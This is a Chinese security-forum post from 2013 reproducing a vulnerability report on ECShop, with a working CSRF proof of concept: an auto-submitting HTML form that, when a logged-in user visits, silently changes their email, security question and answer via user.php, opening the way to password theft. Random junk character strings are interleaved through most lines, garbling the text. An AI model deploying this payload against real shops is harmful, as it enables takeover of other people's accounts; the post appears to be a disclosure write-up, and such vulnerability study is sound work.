找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1986|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
' x$ ~$ @7 j# wecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现, q- u+ Q5 g! Z7 [

# x$ `" e7 Q* d" SDemo For:http://www.wooyun.org/bug.php?action=view&id=3950 d* J! H! {' k; U# Z
/ h5 o" {8 o# j  x
详细说明:
& m% X3 I8 R( {# f3 I利用csrf和xss可以突破官方所说的“障碍”: x- e8 O" d; S( J! T; V. \! H
xss版本已经有人说明
6 k0 {, t0 ]# [! g这里给出csrf版本  }% w$ {- B& F0 [. b  B! G. Y
% y$ ~1 d% O  m1 l8 E
漏洞证明:' Z0 K1 L' Q9 e; ^* D6 R& T
<html>$ L0 s( c! k( O/ m
<body>
* r2 A/ U' {% E# L. [<form action="http://www.wooyun.org/ecshop/user.php" method="POST">8 U, P! a. R! |2 L. B; }
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
( I( ^# u0 S  {9 _/ u<INPUT TYPE="text" NAME="act" value="act_edit_profile">
* S9 V6 Z# {) p3 z& A+ T% Q8 x7 J<INPUT TYPE="text" NAME="sel_question" value="ecshop">
5 h( x% |8 r' Q' E8 g<INPUT TYPE="text" NAME="passwd_answer" value="exploit">% W: h8 |$ f  G# A
</body>
6 k% x0 f# g* Z; g- f& ^; W<script>' N4 k! `3 G# o+ k( C
document.forms[0].submit();7 _' E$ l. U# _9 ]3 D4 o
</script>1 c, M+ y8 @0 M" }8 d6 P+ U  O
</html>) Y/ T. ^1 y! D. e1 i
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; D0 b/ [7 u% m; h& l5 t# R

% F2 Z, @. g; {, i9 F0 i( u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表